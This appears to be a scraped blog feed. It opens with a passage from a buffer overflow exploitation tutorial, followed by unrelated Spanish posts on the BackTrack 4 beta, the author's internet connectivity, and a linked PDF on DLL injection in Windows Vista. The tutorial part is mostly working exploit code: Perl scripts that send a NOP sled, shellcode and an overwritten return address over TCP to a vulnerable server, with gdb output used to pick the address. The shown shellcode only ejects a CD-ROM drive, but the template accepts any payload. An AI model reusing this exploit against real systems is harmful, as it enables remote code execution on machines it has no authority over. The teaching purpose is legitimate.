0xbffff388: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90

---

As you can see we have overwritten the extended instruction pointer once again
and you can see our nopsled above in memory

Let's pick a random address from the nopsled,

0xbffff2f8

write it in little-endian format (more info: http://www.answers.com/topic/endianness)

EIP:

\xf8\xf2\xff\xbf

and let's replace the old EIP with the new one in our "server_exploit.c" program

so:

char *eip = "\x42\x42\x42\x42";

becomes

char *eip = "\xf8\xf2\xff\xbf";

and let's recompile the program,

gcc server_exploit.c -o server_exploit

client:
---

./server_exploit 192.168.1.101
Payload Size: 272
Payload Sent..
---

server:
---
bash-3.00# ./server
got connection from 192.168.1.100
The client says "jX1?Qhdromhev/ch///d??ð6f? S? @?????"
^[[?1;2cbash-3.00# 1;2c
---

and yes, my cd-rom drive ejected....

as you can see we have managed to successfully exploit a remote
buffer overflow by using c code. Some people have allot of problems with
c , they find it hard or they are to lazy to learn it :PpPppP

Perl is allot easier to learn in my opinion and would be confortable for
some people.The next section will use Perl to exploit this vulnerability
and open the cd-rom drive of the computer.

[1.5]--[ Payload/Code construction/analyses in Perl

Let's start again by sending a 272 byte buffer to the server in Perl,

send_overflow.pl
---

#!/usr/bin/perl

####################################################################
#
#-- Send overflow (Perl version) written by Preddy
#
# Part of Preddy's Remote Exploitation with C and Perl tutorial
#
# Usage: perl send_overflow.pl
#
# Example: perl send_overflow.pl 192.168.1.101
#
####################################################################

#IO::Socket for network connections
use IO::Socket;

#the ip address is our first commandline argument also known as ARGV[0] in Perl
$ip = $ARGV[0];

#our payload which is 272 bytes of A (0x41,x41)
$payload = "\x41"x272;

#view a message if no ip address is given
if(!$ip)
{

die "Specify ip plz..\n";

}

#the remote port to connect to
$port = '7500';

#the connection protocol to use
$protocol = 'tcp';

#create the actual network connection
#and print an error message if it's not possible to create a socket
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Could not create socket\n";

#send the payload to the remote computer
print $socket $payload;

#close the connection
close($socket);

---

Let's start by running the script without any arguments,

perl send_overflow.pl
Specify ip plz..

And let's send the payload (272 x A - 0x41)

client:
---
perl send_overflow.pl 192.168.1.101

---

server:
---

bash-3.00# ./server
got connection from 192.168.1.100
The client says "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"
Segmentation fault (core dumped)
bash-3.00# gdb -c core ./server
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".

Core was generated by `./server'.
Program terminated with signal 11, Segmentation fault.

warning: current_sos: Can't read pathname for load map: Input/output error

Reading symbols from /lib/tls/libc.so.6...done.
Loaded symbols for /lib/tls/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)
(gdb) i r eip
eip 0x41414141 0x41414141
---

as you can see we have overwritten eip ,

now let's construct our payload

[NOPSLED - 228 bytes] + [SHELLCODE - 40 bytes] + [EIP - 4 bytes] = 272 bytes

we can just use the same payload from the C section
in it's perl form.

server_exploit.pl
---
#!/usr/bin/perl

####################################################################
#
#-- Server Exploit (Perl version) written by Preddy
#
# Part of Preddy's Remote Exploitation with C and Perl tutorial
#
# Usage: perl server_exploit.pl
#
# Example: perl server_exploit.pl 192.168.1.101
#
####################################################################

#IO::Socket for network connections
use IO::Socket;

#the ip address is our first commandline argument also known as ARGV[0] in Perl
$ip = $ARGV[0];

#our nopsled
$nopsled = "\x90"x228;

#our shellcode which opens the remote cd-rom drive - 40 bytes (thanks to izik)
$shellcode = "\x6a\x05". # push $0x5
"\x58". # pop %eax
"\x31\xc9". # xor %ecx,%ecx
"\x51". # push %ecx
"\xb5\x08". # mov $0x8,%ch
"\x68\x64\x72\x6f\x6d". # push $0x6d6f7264
"\x68\x65\x76\x2f\x63". # push $0x632f7665
"\x68\x2f\x2f\x2f\x64". # push $0x642f2f2f
"\x89\xe3". # mov %esp,%ebx
"\xcd\x80". # int $0x80
"\x89\xc3". # mov %eax,%ebx
"\xb0\x36". # mov $0x36,%al
"\x66\xb9\x09\x53". # mov $0x5309,%cx
"\xcd\x80". # int $0x80
"\x40". # inc %eax
"\xcd\x80"; # int $0x80

#our extended instruction pointer which we use to overwrite the remote eip
$eip = "\xf8\xf2\xff\xbf";

#we construct our full payload here
$payload = $nopsled.$shellcode.$eip;

#view a message if no ip address is given
if(!$ip)
{

die "Specify ip plz..\n";

}

#the remote port to connect to
$port = '7500';

#the connection protocol to use
$protocol = 'tcp';

#create the actual network connection
#and print an error message if it's not possible to create a socket
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Could not create socket\n";

#send the payload to the remote computer
print $socket $payload;

#close the connection
close($socket);

---
Let's run the perl script again:

perl server_exploit.pl 192.168.1.101

and yes! my cd-rom drive opened again :) what a miracle.. :PpPppP
(kids: don't irritate your father's box by continuesly opening his cd-rom drive)

[1.6]--[ Conclusion

Well we have learned to construct payloads and write exploits which
use those payloads. A good thing to do is to learn more about different
types of overflows and their exploitation methods, also practicing
different types of programming languages could be usefull.

[1.7]--[ Contact & Feedback

You can contact me by,

IRC:

FREENODE: ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor
MILW0RM: #milw0rm
GSO: #gso-chat
STS: #lecture,#social

IM , msn : preddy @hushmail.com

EMAIL, : m4ilinglists @gmail.com

please notify me of any mistake's which I might have made :)
or any other comments..

Cya around guyz,

Preddy

lol

Lanzada Beta De Backtrack4 Basada En Ubuntu :D

noreply@blogger.com (Bryant Alston) — Tue, 24 Feb 2009 15:53:04 PST

Aunque no es una gran noticia ni tampoco nueva ya fue lanzada la version nueva de Backtrack4 en su edicion beta...

yo ya la descargue personalmente y el cambio de la base distro de Slackware (slax) a Debian
(ubuntu) no es muy favorecido de mi parte...

por lo que puedo analizar que los desarrolladores de backtrack solo querian implementar mas al usuario "newbie" o usuario normal y la compatibilidad de hardware que carecia la revision pasada con su nuevo kernel...

cuenta con repositorios de la comunidad "Ubuntu" y su gestor de paquetes synaptic aunque para los que no le gustan el gestor todavia existe "apt" en fin la orientacion es que los desarrolladores tienen miras a competir con las distribuciones mas populares...

en este caso sigue siendo una distribucion de linux live orientada a la auditoria de sistemas/wireless/lan/servidores/passwords/forense para mi una buena distribucion si no la mejor para estos fines de auditorias de seguridad...

muchos profesionales IT opinan que es la mejor suite de herramientas para estos fines y yo no difiero con ellos...

desde la practica del "Ethical Hacking" (Hacking Etico) hasta practicas Script Kiddies.
o rituales de Lammers en fin pueden usarlo todo tipo de personas no significa que usarla te convierte en alguno de esos terminos en esta revision buscaron hacerla un poco mas amigable para el usuario normal..

aunque cabe recalcar que sigue siendo una suite y conjunto de herramientas orientadas al IT o auditorias..

esta revision cuenta con algunos cambios como:

Soporte para tarjetas pico e10 y e12 (para UMPCs)
Posibilidad de arrancar por red mediante PXE
Versión limitada de la herramienta SAINT Exploit
Versión libre de Maltego
Actualizaciones en los drivers de tarjetas wireless, necesarios para auditorías
Soporte RFID
Nuevas herramientas de seguridad.

Aunque no son muchas los cambios no son muy notables referentes a la organizacion del menu sigue siendo kde 3.5 y no la ultima version 4.0 (los rumores son que para la version final lo sera) se le agregaron solo algunas herramientas...

en fin igual los desarrolladores De Remote Exploit hicieron nuevamente un gran trabajo con la mejor live cd de seguridad que existe (Hacking)...

y esperamos que cuando se realize el lanzamiento de la version final se aun mas prometedora,vuelvo y recalco que no favorezco mucho su cambio de slax a ubuntu pero en fin los desarrolladores de dicha live cd hacen su trabajo de manera excelente...

para obtener Backtrack 4 la pueden obtener desde su sitio web :
Version Dvd Aqui.
Version Para Vmware Aqui.
Imagen Para Adherir Al Cd Label.

Traeremos actualizaciones siguientes al lanzamiento de la version final

Pd: La lista de herramientas de Backtrack4 la pueden conseguir aqui LINK

salu2

Conectividad [Problema Resuelto]

noreply@blogger.com (Bryant Alston) — Tue, 24 Feb 2009 13:30:49 PST

Ya llegue al infierno aqui las temperaturas varian notablemente de 40 grados suben a la hora pico a los 100 grados :D...

en fin ni que hablar de la conexion de internet aparte de que tienen censurados la mayoria de los sitios que conozco si posees tu tarjeta de internet debes hacer miles de cosas para conectarte...

malditos en fin ya puedo conectarme y a poner al dia mi maldito blog ya que por si es mi unica herramienta que poseo para entretenerme o expresar lo que estoy pasando con esta nueva etapa en mi vida...

1st Squad,3rd Platoon,Echo Company 2-54 U.S.M.C

Inyeccion DLL En Windows Vista

noreply@blogger.com (Bryant Alston) — Tue, 27 Jan 2009 16:07:57 PST

An insight on how to inject a dynamic library (DLL) into a 32 bit process in Windows Vista with the use of Remote Threads
and taking into consideration the Address Space Layout Randomization (ASLR). The sample code used is written in
assembly language (MASM32) using the WinAsm IDE. It should give you a better understanding on how dynamic libraries
can be injected.

Un Analisis Mas A Fondo De Como Injectar Una Libreria Dinamica (Dll) En Windows Vista.

Es Un Archivo Pdf En Ingles Y muy Explicado :D

http://rapidshare.com/files/190409926/275.pdf.html